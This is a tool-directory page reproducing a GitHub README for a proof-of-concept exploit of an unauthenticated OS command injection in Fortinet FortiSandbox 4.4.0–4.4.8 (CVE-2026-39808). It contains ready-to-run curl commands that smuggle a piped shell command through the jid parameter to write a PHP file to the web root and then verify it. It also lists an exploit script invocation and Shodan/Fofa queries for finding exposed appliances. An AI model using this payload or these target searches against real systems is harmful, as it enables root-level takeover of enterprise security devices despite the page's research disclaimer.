Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-39808 — Fortinet FortiSandbox 4.4.0-4.4.8 - OS Command Injection via tracer-behavior Endpoint | Kitploit
Tools/GitHubGitHub/error-inside/cve-2026-39808
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHuberror-inside/cve-2026-39808

CVE-2026-39808

Fortinet FortiSandbox 4.4.0-4.4.8 - OS Command Injection via tracer-behavior Endpoint

View Repository
2 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-39808

Python CVSS License Educational

Fortinet FortiSandbox 4.4.0-4.4.8 - OS Command Injection via tracer-behavior Endpoint

Fortinet FortiSandbox is an advanced threat protection solution that creates isolated environments to analyze suspicious files, URLs, and network traffic for malicious behavior. It uses a combination of static analysis, dynamic analysis, AI-powered machine learning, and threat intelligence from FortiGuard to detect zero-day threats, evasive malware, ransomware, and targeted attacks that bypass traditional signature-based defenses. Enterprises should deploy FortiSandbox to protect against emerging threats—particularly unknown malware and advanced persistent threats (APTs); by automatically detonating suspicious content in a secure, isolated environment before it reaches production systems. It integrates with the broader Fortinet Security Fabric and can be deployed as a physical appliance, virtual machine, cloud service, or containerized solution to fit various network architectures.

CVE-2026-39808 is a critical OS command injection vulnerability affecting FortiSandbox versions 4.4.0 through 4.4.8. The flaw stems from improper neutralization of special elements in user-controlled input before it is used in OS command construction (CWE-78), specifically affecting an unspecified API endpoint. An unauthenticated attacker can exploit this vulnerability by sending specially crafted HTTP requests to execute arbitrary operating system commands with root privileges on the underlying system. Successful exploitation grants the attacker complete control over the FortiSandbox appliance, allowing them to access analyzed malware samples, exfiltrate sensitive configuration data, pivot to connected network segments, or use the compromised device as a foothold for further lateral movement within the enterprise environment. This vulnerability is being actively exploited in the wild.

PoC

root@kitploit:~
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
  "http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

Usage

root@kitploit:~
python CVE-2026-39808-X7.py
  • Zern : title:FortiSandbox
  • Fofa : title="FortiSandbox"
  • Shodan : http.title:FortiSandbox

Reources

  • OpenCVE - CVE-2026-39808 - OS Command Injection in FortiSandbox 4.4.x Releases
  • NIST - CVE-2026-39808 Detail
  • Fortinet FortiSandbox

Disclaimer

This repository and its contents are provided strictly for legitimate security research, authorized penetration testing, educational study, and defensive purposes. By accessing or using this material, you acknowledge full responsibility for ensuring your activities comply with all applicable laws and that you have obtained proper authorization before testing or applying these techniques against any system you do not own.

The authors and maintainers of this project assume no liability for any damages, legal consequences, or misuse resulting from the application of this information. Any use for unauthorized access, malicious activity, or illegal purposes is expressly prohibited and unsupported.

Use responsibly. Stay legal. Test only what you own or have explicit written permission to test.

Authors

  • ErrorInside // SCT

License

SCT-PL

Download Tool